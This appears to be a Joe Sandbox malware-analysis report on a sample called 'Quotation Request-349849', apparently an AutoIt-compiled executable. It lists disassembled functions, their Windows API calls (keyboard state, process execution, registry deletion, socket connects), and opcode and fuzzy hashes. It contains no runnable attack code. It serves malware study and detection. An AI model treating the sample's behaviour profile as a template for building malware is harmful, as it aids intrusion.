                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 5ffe54ea3002f2358e51534d92a36ffaff8c1578f75557a7a28b4a3d269b92b7
                                                      • Instruction ID: 110d6035e5ca9a740af0921eb36ccda9bd4b30d26f0a73d72080abb5fe50bb69
                                                      • Opcode Fuzzy Hash: 5ffe54ea3002f2358e51534d92a36ffaff8c1578f75557a7a28b4a3d269b92b7
                                                      • Instruction Fuzzy Hash: BE81D071604304ABC710EB28CC86F6AB7B8FF85724F14491AF655DB292EB75AD04CB92
                                                      Function 007D1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fba3b1aedbda91535846d447114127a06d2a03bf7019f1ea642d0a12cb1226b
                                                      • Instruction ID: e56858c1725473b70a9c7b4e2939d3bab8b4847bb072de227b9886a0042a9e01
                                                      • Opcode Fuzzy Hash: 8fba3b1aedbda91535846d447114127a06d2a03bf7019f1ea642d0a12cb1226b
                                                      • Instruction Fuzzy Hash: C5716930900209FFCB05DF98CD48ABEBB79FF85314F54815AF915AB291C738AA51CBA0
                                                      Function 0085B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(01544C48), ref: 0085B3EB
                                                      • IsWindowEnabled.USER32(01544C48), ref: 0085B3F7
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0085B4DB
                                                      • SendMessageW.USER32(01544C48,000000B0,?,?), ref: 0085B512
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0085B54F
                                                      • GetWindowLongW.USER32(01544C48,000000EC), ref: 0085B571
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0085B589
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: 045ae51fd874955e789433018b42149d9b37f52a09e2bba66908a4e9b6cc333b
                                                      • Instruction ID: e0577a8161e5c102466c09b62c91e3b950230394ee58f8b29245c3107b09e5d3
                                                      • Opcode Fuzzy Hash: 045ae51fd874955e789433018b42149d9b37f52a09e2bba66908a4e9b6cc333b
                                                      • Instruction Fuzzy Hash: 18718C34600604AFDF319F94C894FBABBA9FF69302F144069EE45E73A2C731A949CB54
                                                      Function 0084F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0084F448
                                                      • _memset.LIBCMT ref: 0084F511
                                                      • ShellExecuteExW.SHELL32(?), ref: 0084F556
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                      • GetProcessId.KERNEL32(00000000), ref: 0084F5CD
                                                      • CloseHandle.KERNEL32(00000000), ref: 0084F5FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: 837ec15d429a2c640a1bd63f8b72e1bc6f38de571a8f51999f0d293a7317b5fd
                                                      • Instruction ID: aaddb56383ecd5216c81e1a74da9ad4154932e74a20e0f1cab9bf4afd734ac5a
                                                      • Opcode Fuzzy Hash: 837ec15d429a2c640a1bd63f8b72e1bc6f38de571a8f51999f0d293a7317b5fd
                                                      • Instruction Fuzzy Hash: AE61AD75A00619DFCB04EF68C4859AEBBF5FF48310F15806EEA59AB352CB34AD41CB94
                                                      Function 00830F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00830F8C
                                                      • GetKeyboardState.USER32(?), ref: 00830FA1
                                                      • SetKeyboardState.USER32(?), ref: 00831002
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00831030
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0083104F
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00831095
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008310B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
                                                      • Instruction ID: d2609fd02a5bc4475d070c26291d61e1129fb39282fb98b14ae51221677c4d26
                                                      • Opcode Fuzzy Hash: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
                                                      • Instruction Fuzzy Hash: F551E6A0504BD53DFF3642348C29BBABEA9BB86B04F088589E1D5C58D3C6D9DCC4D791
                                                      Function 00830D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00830DA5
                                                      • GetKeyboardState.USER32(?), ref: 00830DBA
                                                      • SetKeyboardState.USER32(?), ref: 00830E1B
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00830E47
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00830E64
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00830EA8
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00830EC9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
                                                      • Instruction ID: 7834f7191bedfac4a1798d186701d1fe297abee0fc66fc29487b38ec4e7f1b34
                                                      • Opcode Fuzzy Hash: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
                                                      • Instruction Fuzzy Hash: 1951E6A06087D53DFB3283748C65B7A7EE9FB86300F088989E1D4C64C2D795AC94DB91
                                                      Function 008355FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: 89baeda2ab8a4e237d580940f87490ee495a16523d692222b25df2a4ca8581a1
                                                      • Instruction ID: cb9a0310724f7e7b78caea99d8c9e3e4291430e6c0fc8780338568cdfd65d64c
                                                      • Opcode Fuzzy Hash: 89baeda2ab8a4e237d580940f87490ee495a16523d692222b25df2a4ca8581a1
                                                      • Instruction Fuzzy Hash: 16418365C1161CB6CB11EBF48C4AADFB3B8AF44310F508956E618E3221FA38A255C7E6
                                                      Function 00833671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00833697,?), ref: 0083468B
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00833697,?), ref: 008346A4
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 008336B7
                                                      • _wcscmp.LIBCMT ref: 008336D3
                                                      • MoveFileW.KERNEL32(?,?), ref: 008336EB
                                                      • _wcscat.LIBCMT ref: 00833733
                                                      • SHFileOperationW.SHELL32(?), ref: 0083379F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: dc61b281ba6e295f4dd2af09bdcbb7d3fe01ff27abaf033932fa03fc6e53fe53
                                                      • Instruction ID: 59029745c6b3b085064ee0769bd0c330433da2d923403763eb4b71428c237491
                                                      • Opcode Fuzzy Hash: dc61b281ba6e295f4dd2af09bdcbb7d3fe01ff27abaf033932fa03fc6e53fe53
                                                      • Instruction Fuzzy Hash: 6E417EB1508344AED751EF64D4469EFB7E8FF98380F40192EB49AC3251EB38D689C792
                                                      Function 00857291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 008572AA
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00857351
                                                      • IsMenu.USER32(?), ref: 00857369
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008573B1
                                                      • DrawMenuBar.USER32 ref: 008573C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: ded161632662e9e83e19f6062acd0529379ce48817852b33f791a0aad698db75
                                                      • Instruction ID: 8fa6f36e2114bc7f72862ca5264b7e99f87233814d6ce9583080dc73e870098c
                                                      • Opcode Fuzzy Hash: ded161632662e9e83e19f6062acd0529379ce48817852b33f791a0aad698db75
                                                      • Instruction Fuzzy Hash: 58412475A04208EFDB20DF50E884AEABBB9FF08366F548469FD05AB350D730AD58DB50
                                                      Function 00850FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00850FD4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00850FFE
                                                      • FreeLibrary.KERNEL32(00000000), ref: 008510B5
                                                        • Part of subcall function 00850FA5: RegCloseKey.ADVAPI32(?), ref: 0085101B
                                                        • Part of subcall function 00850FA5: FreeLibrary.KERNEL32(?), ref: 0085106D
                                                        • Part of subcall function 00850FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00851090
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00851058
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 0a849f4196e76c6ffcd77139284713dafa8c290428bcf5a97a79c8e30c59f5a1
                                                      • Instruction ID: 3445b81038f2cb587b73b03f395b186b763257dcf87fb8fc0ef5f9e762f7b252
                                                      • Opcode Fuzzy Hash: 0a849f4196e76c6ffcd77139284713dafa8c290428bcf5a97a79c8e30c59f5a1
                                                      • Instruction Fuzzy Hash: 74310A71900609BFDF159B94DC89EFFB7BCFF08351F040169EA01E2181EB749E899AA0
                                                      Function 008562CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008562EC
                                                      • GetWindowLongW.USER32(01544C48,000000F0), ref: 0085631F
                                                      • GetWindowLongW.USER32(01544C48,000000F0), ref: 00856354
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00856386
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008563B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 008563C1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008563DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: b3d9eb176c89009898a21c7633e0fbdd5d3a19edaf251794a024193b3bae30a5
                                                      • Instruction ID: df6afdc71d23f9630e0f2e8fe415c2f440394bb6eab79c8e82ae49fb9a7fc337
                                                      • Opcode Fuzzy Hash: b3d9eb176c89009898a21c7633e0fbdd5d3a19edaf251794a024193b3bae30a5
                                                      • Instruction Fuzzy Hash: E7312230600241AFDB21DF18DC84F9537E1FB4A756F9801A8FA01DF2B2DB71A858CB51
                                                      Function 0082DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DB2E
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DB54
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0082DB57
                                                      • SysAllocString.OLEAUT32(?), ref: 0082DB75
                                                      • SysFreeString.OLEAUT32(?), ref: 0082DB7E
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0082DBA3
                                                      • SysAllocString.OLEAUT32(?), ref: 0082DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 488400f4a156e4540302aaa31f3b7f8afa87f9de7629b55a2fe9ecb904616242
                                                      • Instruction ID: 19c930caf894b92e8f8e73d14cc75e7fa6a623a3d2711dbc0e6b68f9676566b0
                                                      • Opcode Fuzzy Hash: 488400f4a156e4540302aaa31f3b7f8afa87f9de7629b55a2fe9ecb904616242
                                                      • Instruction Fuzzy Hash: DD218176601329AF9F10DFA8EC88CBB77ACFB09371B018525FE14DB251D674AC8587A4
                                                      Function 00846173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00847D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00847DB6
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008461C6
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008461D5
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0084620E
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00846217
                                                      • WSAGetLastError.WSOCK32 ref: 00846221
                                                      • closesocket.WSOCK32(00000000), ref: 0084624A
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00846263
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: 3e980de324d22179656ceb53cbb3868524523e8834dcde9f8254d611ba0021db
                                                      • Instruction ID: ebbe746c1d685ca1fe402df2c8ad8b823d2dce7b0f736e45cd259753fce88583
                                                      • Opcode Fuzzy Hash: 3e980de324d22179656ceb53cbb3868524523e8834dcde9f8254d611ba0021db
                                                      • Instruction Fuzzy Hash: 5F31A431600218ABDF10AF24CC85BBD7BBDFF45715F044029FA05E7291DB74AC149B62
                                                      Function 0082F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: 291f6cd2340500c1b4ee905b65e73b7569c6ca5802df56fe7b195848893ef0bb
                                                      • Instruction ID: ba63a4d441c84cacf762c4489f742e8830245350fcb491d7292c260a1ed04747
                                                      • Opcode Fuzzy Hash: 291f6cd2340500c1b4ee905b65e73b7569c6ca5802df56fe7b195848893ef0bb
                                                      • Instruction Fuzzy Hash: D5214572204575AAC220AA34BC06EB773E8FF65354B10403AFB46C6293EB589D85C3A4
                                                      Function 0082DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DC09
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DC2F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0082DC32
                                                      • SysAllocString.OLEAUT32 ref: 0082DC53
                                                      • SysFreeString.OLEAUT32 ref: 0082DC5C
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0082DC76
                                                      • SysAllocString.OLEAUT32(?), ref: 0082DC84
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: fed21033f1dc443993859112405492400f0be56c47194e29c96ac775de16f2bf
                                                      • Instruction ID: 161588191621d769799e1d6df87d100cfb7d8ad73629b0ff921f08cd48237d2c
                                                      • Opcode Fuzzy Hash: fed21033f1dc443993859112405492400f0be56c47194e29c96ac775de16f2bf
                                                      • Instruction Fuzzy Hash: 3F214475605318AF9B10DFA8EC88DAB7BECFB09360B508125FA14CB361D678EC85C764
                                                      Function 008575CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
                                                        • Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
                                                        • Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00857632
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0085763F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0085764A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00857659
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00857665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
